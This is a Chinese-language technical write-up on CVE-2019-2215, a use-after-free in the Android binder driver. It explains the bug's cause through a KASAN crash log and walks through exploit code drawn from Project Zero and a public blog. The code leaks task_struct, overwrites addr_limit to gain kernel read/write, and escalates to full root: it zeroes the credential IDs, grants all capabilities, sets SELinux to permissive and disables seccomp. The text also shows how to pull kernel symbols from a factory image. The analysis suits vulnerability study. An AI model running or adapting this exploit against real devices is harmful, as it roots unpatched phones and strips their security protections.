bugs.chromium project-zero email,project zero的公开邮件
Project Zero博客,对漏洞成因和利用细节有详细说明
linux各版本源码,用来找各变量类型间的定义比较方便,但其中对于结构体和各类定义都比较老,这部分代码参考其他来源比较好
4.4.169-gee9976dde895
google 下载ndk最新版本
使用命令编译
$ ndk/<ndk版本号>/toolchains/llvm/prebuilt/<ndk工具平台>/bin/aarch64-linux-android28-clang -o poc poc.c
来源:https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
只包含main的简短的poc用于触发漏洞,展示了内核存在的漏洞点。在未补丁的系统上运行有可能导致内核崩溃
来源:https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
利用该漏洞进行内核任意地址读写。该poc运行后的uname -a
输出中可以看到EXPLOITED KERNEL
来源:https://hernan.de/blog/tailoring-cve-2019-2215-to-achieve-root/
利用该漏洞进行本地提权
漏洞成因:使用了epoll的进程在调用BINDER_THREAD_EXIT结束binder线程时会释放binder_thread结构体,然后在程序退出或调用EPOLL_CTL_DEL时会遍历已释放结构体binder_thread中的wait链表进行链表删除操作。
问题在于,当程序退出或调用epoll的清理操作时,此时访问的wait链表位于已释放的binder_thread结构体中,uaf产生。如果在binder_thread释放后手动申请内存占位,那么在程序访问到wait链表时就会在手动申请的内存中操作,从而泄露信息。利用这些信息可以进一步达到内核任意地址读写甚至提权等操作。
binder_thread
结构体,是导致uaf的关键结构体:
//https://android.googlesource.com/kernel/msm/+/550c01d0e051461437d6e9d72f573759e7bc5047/drivers/android/binder.c#615 struct binder_thread { struct binder_proc *proc; struct rb_node rb_node; struct list_head waiting_thread_node; int pid; int looper; /* only modified by this thread */ bool looper_need_return; /* can be written by other thread */ struct binder_transaction *transaction_stack; struct list_head todo; bool process_todo; struct binder_error return_error; struct binder_error reply_error; //uaf point (offset 0xA0) wait_queue_head_t wait; struct binder_stats stats; atomic_t tmp_ref; bool is_dead; //root point (offset 0x190) struct task_struct *task; };
poc.c的代码,触发漏洞的过程:
//poc.c #include <fcntl.h> #include <sys/epoll.h> #include <sys/ioctl.h> #include <unistd.h> #define BINDER_THREAD_EXIT 0x40046208ul int main() { int fd, epfd; struct epoll_event event = { .events = EPOLLIN }; fd = open("/dev/binder0", O_RDONLY); epfd = epoll_create(1000); epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event); ioctl(fd, BINDER_THREAD_EXIT, NULL); }
KASAN的crash输出(部分省略):
//https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414028
[ 464.504637] c0 3033 ==================================================================
[ 464.504747] c0 3033 BUG: KASAN: use-after-free in remove_wait_queue+0x48/0x90
[ 464.511836] c0 3033 Write of size 8 at addr 0000000000000000 by task new.out/3033
[ 464.518893] c0 3033
[ 464.526548] c0 3033 CPU: 0 PID: 3033 Comm: new.out Tainted: G C 4.4.177-ga9e0ec5cb774 #1
[ 464.529044] c0 3033 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
[ 464.538334] c0 3033 Call trace:
[ 464.545928] c0 3033 [<ffffff900808f0e8>] dump_backtrace+0x0/0x34c
[ 464.549328] c0 3033 [<ffffff900808f574>] show_stack+0x1c/0x24
[ 464.555411] c0 3033 [<ffffff900858bcc8>] dump_stack+0xb8/0xe8
[ 464.561319] c0 3033 [<ffffff90082b1ecc>] print_address_description+0x94/0x334
[ 464.567219] c0 3033 [<ffffff90082b23f0>] kasan_report+0x1f8/0x340
[ 464.574501] c0 3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[ 464.580753] c0 3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[ 464.587125] c0 3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[ 464.593617] c0 3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[ 464.601149] c0 3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[ 464.606988] c0 3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[ 464.613724] c0 3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[ 464.619463] c0 3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[ 464.625193] c0 3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[ 464.631260] c0 3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[ 464.637167] c0 3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[ 464.643421] c0 3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[ 464.649944] c0 3033
[ 464.655899] c0 3033 Allocated by task 3033:
[ 464.658257] [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[ 464.663899] [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[ 464.669882] [<ffffff90082b0b14>] kasan_kmalloc.part.5+0x50/0x124
[ 464.675528] [<ffffff90082b0e38>] kasan_kmalloc+0xc4/0xe4
[ 464.681597] [<ffffff90082ac8a4>] kmem_cache_alloc_trace+0x12c/0x240
[ 464.686992] [<ffffff90094093c0>] binder_get_thread+0xdc/0x384
[ 464.693319] [<ffffff900940969c>] binder_poll+0x34/0x1bc
[ 464.699127] [<ffffff900833839c>] SyS_epoll_ctl+0x704/0xf84
[ 464.704423] [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[ 464.709971] c0 3033
[ 464.714124] c0 3033 Freed by task 3033:
[ 464.716396] [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[ 464.721699] [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[ 464.727678] [<ffffff90082b16a4>] kasan_slab_free+0xb0/0x1c0
[ 464.733322] [<ffffff90082ae214>] kfree+0x8c/0x2b4
[ 464.738952] [<ffffff900940ac00>] binder_thread_dec_tmpref+0x15c/0x1c0
[ 464.743750] [<ffffff900940d590>] binder_thread_release+0x284/0x2e0
[ 464.750253] [<ffffff90094149e0>] binder_ioctl+0x6f4/0x3664
[ 464.756498] [<ffffff90082e1364>] do_vfs_ioctl+0x7f0/0xd58
[ 464.762052] [<ffffff90082e1968>] SyS_ioctl+0x9c/0xc0
[ 464.767513] [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
------------------------------ ... ... -----------------------------------
[ 465.201706] c0 3033 Call trace:
------------------------------ ... ... -----------------------------------
[ 465.298084] c0 3033 [<ffffff90082b1ddc>] kasan_end_report+0x38/0x3c
[ 465.306712] c0 3033 [<ffffff90082b22e4>] kasan_report+0xec/0x340
[ 465.313308] c0 3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[ 465.319390] c0 3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[ 465.325581] c0 3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[ 465.332075] c0 3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[ 465.339607] c0 3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[ 465.345437] c0 3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[ 465.352183] c0 3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[ 465.357920] c0 3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[ 465.363643] c0 3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[ 465.369711] c0 3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[ 465.375617] c0 3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[ 465.381882] c0 3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[ 465.388494] c0 3033 Code: f9400261 f00124e0 91000000 945d2daa (d4210000)
[ 465.394428] c0 3033 ---[ end trace 3129689a85316455 ]---
尝试根据kasan的输出寻找引发内核崩溃的一系列调用:
epoll_ctl
调用后申请了binder_thread
结构,binder_thread
结构申请的过程在Allocated by task
(27行)中
随后在ioctl
调用过程中释放了binder_thread
结构体,过程在Freed by task(38行)中从SyS_ioctl
(47行)到kfree
(42行)
目前来看程序在正常运行,但在程序结束即将退出时触发了crash,Call trace(50行)处报告了crash时的调用栈
以调用顺序由下往上看,ep_eventpoll_release
(58行)之前是系统退出时的相关调用,从ep_eventpoll_release
往上到remove_wait_queue
是程序结束后epoll相关的清理工作,也就是说在remove_wait_queue
调用后导致了crash
remove_wait_queue
中,参数wq_head
就是binder_thread
中的wait成员
//https://code.woboq.org/linux/linux/kernel/sched/wait.c.html#39 void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry) { unsigned long flags; spin_lock_irqsave(&wq_head->lock, flags); __remove_wait_queue(wq_head, wq_entry); spin_unlock_irqrestore(&wq_head->lock, flags); }
由于binder_thread
释放后,其中的成员wait
(指向wait_queue_head
的指针)没有删除,导致wait指向的是一片被释放的内存,所以在程序退出时调用到remove_wait_queue
中的spin_lock_irqsave
对wait成员的自旋锁检查时出现了错误
int epfd; void *dummy_page_4g_aligned; unsigned long current_ptr; int binder_fd; int kernel_rw_pipe[2]; int main(void) { printf("Starting POC\n"); //pin_to(0); dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (dummy_page_4g_aligned != (void*)0x100000000UL) err(1, "mmap 4g aligned"); if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe"); binder_fd = open("/dev/binder", O_RDONLY); epfd = epoll_create(1000); leak_task_struct(); clobber_addr_limit(); setbuf(stdout, NULL); printf("should have stable kernel R/W now\n"); ...... }
dummy_page_4g_aligned
。这段内存在后面构造数据时会用到,作用是绕过spin_lock_irqsave
检查。"/dev/binder"
,进行epoll_create
操作,和poc.c中开始的操作一样,用于epoll的初始化leak_task_struct
泄露task_struct
地址clobber_addr_limit
覆盖addr_limit
实现内核任意地址读写主要关注点在leak_task_struct
和clobber_addr_limit
这两个函数,逐个分析
为了利用uaf,需要先用writev
重新申请到binder_thread
释放的空间,通过EPOLL_CTL_DEL
调用remove_wait_queue
将wait
的地址泄露到之前申请的内存中。由于task_struct
和wait都位于binder_thread中,所以计算偏移后就能得到task_struct
的指针
利用writev
申请到内核空间
调用writev会经过rw_copy_check_uvector
检查writev第二个参数struct iovec
指针中的每一项是否位于用户空间中,检查通过后会将writev第二个参数复制到内核空间,并且就算之后iov_base
不再指向用户空间也不会再检查。利用这两个特点,可以构造iovec结构体数组的大小与binder_thread
相同或相近,复制时就有很大可能申请到binder_thread
释放后的那块内存,然后利用rw_copy_check_uvector
只检查一次的特性,泄露内核地址后可以读取内核空间的数据。
通过remove_wait_queue
泄露wait
地址
epoll在执行EPOLL_CTL_DEL
时会调用remove_wait_queue
清理wait
链表,通过构造iovec结构体中的数据绕过spin_lock_irqsave
检查后,进入到__remove_wait_queue
函数中,相关函数如下:
static inline void __remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old) { list_del(&old->task_list); } static inline void list_del(struct list_head *entry) { __list_del(entry->prev, entry->next); entry->next = LIST_POISON1; entry->prev = LIST_POISON2; } static inline void __list_del(struct list_head * prev, struct list_head * next) { next->prev = prev; WRITE_ONCE(prev->next, next); }
可以看到调用链:__remove_wait_queue
-> list_del
-> __list_del
list_del
的参数entry就是待删除的task_list
,经过了__list_del
函数的操作后,entry指向的task_list
就从wait链表中取出了,过程如图:
而如果wait链表中只存在一项时(也就是head),就会变成这样:
此时prev和next指向了head自身,而head本身又是位于我们申请的binder_thread
内存中,所以p
和n
泄露出了head的地址,也就是binder_thread
中wait成员的地址。
现在可以来分析poc了:
// size of struct binder_thread : 408Bytes = 0x198 #define BINDER_THREAD_SZ 0x190 // use struct iovec to refill the freed binder_thread // size of struct iovec is 16Bytes (64bit system) #define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25 // offset of wait_queue in binder_thread #define WAITQUEUE_OFFSET 0xA0 // finger out offset of wait_queue in iovec array #define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10 void leak_task_struct(void) { struct epoll_event event = { .events = EPOLLIN }; if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add"); struct iovec iovec_array[IOVEC_ARRAY_SZ]; memset(iovec_array, 0, sizeof(iovec_array)); iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */ iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */ iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */ iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000; int b; int pipefd[2]; if (pipe(pipefd)) err(1, "pipe"); if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size"); static char page_buffer[0x1000]; //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe"); pid_t fork_ret = fork(); if (fork_ret == -1) err(1, "fork"); if (fork_ret == 0){ /* Child process */ prctl(PR_SET_PDEATHSIG, SIGKILL); sleep(2); printf("CHILD: Doing EPOLL_CTL_DEL.\n"); epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event); printf("CHILD: Finished EPOLL_CTL_DEL.\n"); // first page: dummy data if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe"); close(pipefd[1]); printf("CHILD: Finished write to FIFO.\n"); exit(0); } //printf("PARENT: Calling READV\n"); ioctl(binder_fd, BINDER_THREAD_EXIT, NULL); b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ); printf("writev() returns 0x%x\n", (unsigned int)b); // second page: leaked data if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe"); //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer)); printf("PARENT: Finished calling READV\n"); int status; if (wait(&status) != fork_ret) err(1, "wait"); current_ptr = *(unsigned long *)(page_buffer + 0xe8); printf("current_ptr == 0x%lx\n", current_ptr); }
进行EPOLL_CTL_ADD
,添加对binder_fd的监听事件,同poc.c
初始化iovec_array
,并填充构造数据
创建pipe并设定好buffer,用于之后父子进程通信
fork生成子进程,子进程一开始sleep了两秒,所以继续看父进程
进行BINDER_THREAD_EXIT
,此时binder_thread
结构体已被释放
父进程调用writev
(因为writev
的特性,binder_thread
被free的内存由iovce_array[IOVEC_ARRAY_SZ]
占位),从iovec_array
读取数据写入pipefd[1]
,根据iovec_array
构造的数据可知,从iovec_array[9]
及以前的内容都为0,所以writev
从iovec_array[10]
开始读取,也就是将dummy_page_4g_aligned
指向的0x1000大小的无用数据写入管道中,由于管道大小也为0x1000所以writev
阻塞,此时转到子进程
由于binder_thread
已被构造的数据占位,所以目前内存中的情况如下:
| binder_thread struct | iovec_array |
| ------------------------- | ------------------------------------------------------ |
| 0x00: ... | 0x00: iovec_array[0].iov_len |
| 0x08: ... | 0x08: iovec_array[0].iov_base |
| ... | ... |
| ... | ... |
| 0xA0: wait.lock | 0xA0: iovec_array[10].iov_base (dummy_page_4g_aligned) |
| 0xA8: wait.task_list.next | 0xA8: iovec_array[10].iov_len (0x1000) |
| 0xB0: wait.task_list.prev | 0xB0: iovec_array[11].iov_base (0xDEADBEEF) |
| 0xB8: ... | 0xB8: iovec_array[11].iov_len (0x1000) |
| ... | ... |
| ... | ... |
此时子进程调用EPOLL_CTL_DEL
触发uaf,进入remove_wait_queue
后dummy_page_4g_aligned
绕过了自旋锁检查,进行删除链表项的操作时wait.task_list.next
和wait.task_list.prev
都指向自身(wait.task_list
),所以现在iovec_array[10].iov_len
和iovec_array[11].iov_base
都保存了泄露的地址
然后子进程进行read
操作,将刚才父进程写入的无用数据读出以解除父进程的阻塞状态,子进程结束,转到父进程
父进程继续未完成的writev
函数,将iovec_array[11].iov_base
指向的0x1000大小的数据写入管道,而此时iovec_array[11].iov_base
的数据已经在子进程中被覆盖为了泄露的wait地址,所以此时读取的是wait结构体之后的数据
调用read函数,将读取到的数据保存到page_buffer
中
根据task_struct
在binder_thread
中的偏移,计算出task_struct
的地址,保存在current_ptr
中,函数结束
泄露过程:
直接开始分析:
void clobber_addr_limit(void) { struct epoll_event event = { .events = EPOLLIN }; if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add"); struct iovec iovec_array[IOVEC_ARRAY_SZ]; memset(iovec_array, 0, sizeof(iovec_array)); unsigned long second_write_chunk[] = { 1, /* iov_len */ 0xdeadbeef, /* iov_base (already used) */ 0x8 + 2 * 0x10, /* iov_len (already used) */ current_ptr + 0x8, /* next iov_base (addr_limit) */ 8, /* next iov_len (sizeof(addr_limit)) */ 0xfffffffffffffffe /* value to write */ }; iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */ iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */ iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */ iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */ iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD; iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */ int socks[2]; if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair"); if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte"); pid_t fork_ret = fork(); if (fork_ret == -1) err(1, "fork"); if (fork_ret == 0){ /* Child process */ prctl(PR_SET_PDEATHSIG, SIGKILL); sleep(2); printf("CHILD: Doing EPOLL_CTL_DEL.\n"); epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event); printf("CHILD: Finished EPOLL_CTL_DEL.\n"); if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk)) err(1, "write second chunk to socket"); exit(0); } ioctl(binder_fd, BINDER_THREAD_EXIT, NULL); struct msghdr msg = { .msg_iov = iovec_array, .msg_iovlen = IOVEC_ARRAY_SZ }; printf("PARENT: Doing recvmsg.\n"); int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL); printf("PARENT recvmsg() returns %d, expected %lu\n", recvmsg_result, (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len + iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len + iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len)); }
进行EPOLL_CTL_ADD
,相同的操作
初始化iovec_array
,构造数据
初始化second_write_chunk
,构造数据
socketpair
初始化socket,并向socks[1]
写入1字节
fork生成子进程,sleep(2)
,看父进程
进行BINDER_THREAD_EXIT
,此时binder_thread
结构体已被释放
调用recvmsg
,读取之前写入socket的1字节,此时为第一次读取(recvmsg#1)
recvmsg
和writev都可以将用户空间的数据复制到内核空间,所以调用recvmsg
时binder_thread
的内存被占位
socket中没有更多数据可读取,此时父进程阻塞,转到子进程
子进程调用EPOLL_CTL_DEL
触发uaf,与之前的情况一样,iovec_array[10].iov_len
和iovec_array[11].iov_base
被改写为wait.task_list
地址
子进程调用write
向socket
写入second_write_chunk
,此时socket中存在数据,父进程解除阻塞状态,子进程结束,转到父进程
父进程根据iovec_array[11].iov_len
读取0x28大小的数据到iovec_array[11].iov_base
中,此时为第二次读取(recvmsg#2)
由于second_write_chunk
大小为0x30,所以recvmsg
还要再读取8字节数据,也就是second_write_chunk
最后8字节0xfffffffffffffffe
,而此时iovec_array[12].iov_base
已经在recvmsg#2
操作中被覆盖为current_ptr + 0x8
也就是task_struct + 0x8
,这个地址即addr_limit
的地址,所以在recvmsg#3
读取后,addr_limit
被覆盖为0xfffffffffffffffe
,得到了任意地址读写的权限,函数结束
// elixir.bootlin.com/linux/v5.5.19/source/include/linux/sched.h#L635 // 链接中的linux版本高于测试机版本4.4.169是由于此网站的结构体定义普遍偏旧,在4.4版本中找不到相应的结构体定义,该版本的结构体定义符合测试机版本 struct task_struct { #ifdef CONFIG_THREAD_INFO_IN_TASK /* * For reasons of header soup (see current_thread_info()), this * must be the first element of task_struct. */ struct thread_info thread_info; #endif volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */ void *stack; atomic_t usage; unsigned int flags; /* per process flags, defined below */ unsigned int ptrace; ...... } //elixir.bootlin.com/linux/v5.5.19/source/arch/arm64/include/asm/thread_info.h#L26 struct thread_info { unsigned long flags; /* low level flags */ mm_segment_t addr_limit; /* address limit */ #ifndef CONFIG_THREAD_INFO_IN_TASK struct task_struct *task; /* main task structure */ #endif #ifdef CONFIG_ARM64_SW_TTBR0_PAN u64 ttbr0; /* saved TTBR0_EL1 */ #endif int preempt_count; /* 0 => preemptable, <0 => bug */ #ifndef CONFIG_THREAD_INFO_IN_TASK int cpu; /* cpu */ #endif };
覆盖过程:
修改内核内存中的数据首先要得到内核基址和内核符号信息,后者用来计算偏移。获取内核符号信息可以通过下载googlesource中的官方镜像然后用工具提取,也可以用已root的同型号同内核版本手机dump出内核信息来获取。以下采用的是通过官方镜像提取的办法。
内核符号信息
根据poc3.c wp提供的方法,获取符号信息过程如下:
google测试机内核版本,本测试机为4.4.169-gee9976dde895
,搜索结果中找到wahoo-kernel repo,下载文件Image.lz4-dtb
(右下角的txt下载,base64解码得到原文件,记得改后缀)
解压下载的文件
$ lz4 -d Image.lz4-dtb Image Stream followed by unrecognized data Successfully decoded 37500928 bytes $ strings Image | grep "Linux version" Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
使用droidimg导出符号表,可能会遇到下面的报错:在寻找kallsyms table时出错
$ ./vmlinux.py Image Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019 [+]kallsyms_arch = arm64 [!]could be offset table... [!]lookup_address_table error... [!]get kallsyms error...
用droidimg中的工具修复Image
$ gcc -o fix_kaslr_arm64 fix_kaslr_arm64.c fix_kaslr_arm64.c:269:5: warning: always_inline function might not be inlinable [-Wattributes] int main(int argc, char **argv) ^~~~ $ ./fix_kaslr_arm64 Image Image_kaslr Origiellnal kernel: Image, output file: Image_kaslr kern_buf @ 0x7f7eb403c000, mmap_size = 37502976 rela_start = 0xffffff8009916430 p->info = 0x0sh rela_end = 0xffffff800a1b0340 375847 entries processed
最后导出符号表
$ ./vmlinux.py Image_kaslr > syms.txt Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019 [+]kallsyms_arch = arm64 [+]numsyms: 131300 [+]kallsyms_address_table = 0x11eb300 [+]kallsyms_num = 131300 (131300) [+]kallsyms_name_table = 0x12ebc00 [+]kallsyms_type_table = 0x0 [+]kallsyms_marker_table = 0x14a4a00 [+]kallsyms_token_table = 0x14a5b00 [+]kallsyms_token_index_table = 0x14a5f00 [+]kallsyms_start_address = 0xffffff8008080000L [+]found 9917 symbols in ksymta
根据导出符号表的地址和基址(kallsyms_start_address = 0xffffff8008080000L
)计算偏移
内核基址
有了符号表偏移后要计算基址只需泄露出某个符号的地址再减去符号表中该符号的偏移即可。
poc2.c
中的做法是找:task_struct->mm->user_ns
地址,减去init_user_ns
偏移。
修改属性
直接用基址+偏移的方式找到系统属性的地址再修改即可
poc3.c中,escalate
函数利用之前获得的内核读写权限进行提权。为了得到full root
即完整root权限,需要绕过linux中多个安全机制(这里仅提出所绕过安全机制的类型,并不对机制做详细解释),不过有了内核读写权限后绕过也不是特别麻烦。权部分代码(其中DEBUG_RW
用于打印额外信息帮助理解):
void escalate() { ...... uid_t uid = getuid(); unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred); // offset 0x78 is pointer to void * security unsigned long current_cred_security = kernel_read_ulong(my_cred+0x78); printf("current->cred == 0x%lx\n", my_cred); printf("Starting as uid %u\n", uid); printf("Escalating...\n"); // change IDs to root (there are eight) for (int i = 0; i < 8; i++) kernel_write_uint(my_cred+4 + i*4, 0); if (getuid() != 0) { printf("Something went wrong changing our UID to root!\n"); exit(1); } printf("UIDs changed to root!\n"); // reset securebits kernel_write_uint(my_cred+0x24, 0); // change capabilities to everything (perm, effective, bounding) for (int i = 0; i < 3; i++) kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL); printf("Capabilities set to ALL\n"); // Grant: was checking for this earlier, but it's not set, so I moved on // printf("PR_GET_NO_NEW_PRIVS %d\n", prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0)); unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing); printf("SELinux status = %u\n", enforcing); if (enforcing) { printf("Setting SELinux to permissive\n"); kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0); } else { printf("SELinux is already in permissive mode\n"); } // Grant: We want to be as powerful as init, which includes mounting in the global namespace printf("Re-joining the init mount namespace...\n"); int fd = open("/proc/1/ns/mnt", O_RDONLY); if (fd < 0) { perror("open"); exit(1); } if (setns(fd, CLONE_NEWNS) < 0) { perror("setns"); exit(1); } printf("Re-joining the init net namespace...\n"); fd = open("/proc/1/ns/net", O_RDONLY); if (fd < 0) { perror("open"); exit(1); } if (setns(fd, CLONE_NEWNET) < 0) { perror("setns"); exit(1); } // Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts if (prctl(PR_GET_SECCOMP) != 0) { printf("Disabling SECCOMP\n"); // Grant: we need to clear TIF_SECCOMP from task first, otherwise, kernel WARN // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag) // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11 kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0); kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0); kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0); if (prctl(PR_GET_SECCOMP) != 0) { printf("Failed to disable SECCOMP!\n"); exit(1); } else { printf("SECCOMP disabled!\n"); } } else { printf("SECCOMP is already disabled!\n"); } // Grant: At this point, we are free from our jail (if all went well) }
Discretionary Access Control——自由访问控制
获取内核读写权限的过程中我们得到了task_struct
的指针,而task_struct
是linux内核中被称为进程描述符的结构体,它包含了一个进程中的各种信息,其中的成员变量cred
是和该进程权限有关的结构体,定义如下:
struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; /* number of processes subscribed */ void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; /* real UID of the task */ kgid_t gid; /* real GID of the task */ kuid_t suid; /* saved UID of the task */ kgid_t sgid; /* saved GID of the task */ kuid_t euid; /* effective UID of the task */ kgid_t egid; /* effective GID of the task */ kuid_t fsuid; /* UID for VFS ops */ kgid_t fsgid; /* GID for VFS ops */ unsigned securebits; /* SUID-less security management */ kernel_cap_t cap_inheritable; /* caps our children can inherit */ kernel_cap_t cap_permitted; /* caps we're permitted */ kernel_cap_t cap_effective; /* caps we can actually use */ kernel_cap_t cap_bset; /* capability bounding set */ kernel_cap_t cap_ambient; /* Ambient capability set */ #ifdef CONFIG_KEYS unsigned char jit_keyring; /* default keyring to attach requested * keys to */ struct key __rcu *session_keyring; /* keyring inherited over fork */ struct key *process_keyring; /* keyring private to this process */ struct key *thread_keyring; /* keyring private to this thread */ struct key *request_key_auth; /* assumed request_key authority */ #endif #ifdef CONFIG_SECURITY void *security; /* subjective LSM security */ #endif struct user_struct *user; /* real user ID subscription */ struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */ struct group_info *group_info; /* supplementary groups for euid/fsgid */ struct rcu_head rcu; /* RCU deletion hook */ } __randomize_layout;
escalate
中首先通过基址加偏移得到cred
地址,然后将该结构体中的uid
到fsgid
修改为0,提权为root。虽然此时已经成为root,但是由于其他linux安全机制的存在,现在的root并没有获得完全的系统控制权,因此后面还修改了其他值。
Linux Capabilities——Linux能力
CAP对应在cred
中kernel_cap_t
类型的成员变量
Mandatory Access Control——强制访问控制
MAC在此处指SELinux。
这里原poc3作者最初想法是修改cred
结构体中的void *security
指向的task_security_struct
结构体中的sid值,将进程从shell级别修改为更高特权级别,如sid=1
。但在poc运行到此处时就卡住了无法继续运行,之后原作者采取了另一个方法也就是修改内核直接将SELinux的模式设置为permissive
。
根据符号selinux_enforcing
偏移获取地址,将该地址值写为0即可将SELinux状态改为permissive
securecomputing mode——限制进程对系统调用的访问
SECCOMP对在adb用运行的poc无影响,但是会阻止捆绑在app上poc的系统调用。
在task_struct
结构中找到:
struct seccomp { int mode; struct seccomp_filter *filter; };
其中mode
有两种模式:SECCOMP_MODE_STRICT
和SECCOMP_MODE_FILTER
,通常工作在filter模式下,当mode设置为0时,seccomp为禁用状态。
但是如果只将mode写为0不会禁用SECCOMP,原因是当SECCOMP运行时,在task_struct->thread_info.flags
会被设置为TIF_SECCOMP
,由于flag没有修改,内核认为SECCOMP处于开启状态,所以内核依旧会调用__secure_computing
,进入该函数时会由于mode为0跳转到BUG()
,原本的系统调用仍然不会执行。
int __secure_computing(const struct seccomp_data *sd) { int mode = current->seccomp.mode; ...... switch (mode) { case SECCOMP_MODE_STRICT: __secure_computing_strict(this_syscall); /* may call do_exit */ return 0; case SECCOMP_MODE_FILTER: return __seccomp_filter(this_syscall, sd, false); default: BUG(); } }
因此mode和flags都需要覆盖。
至此我们获得了完整的root权限。
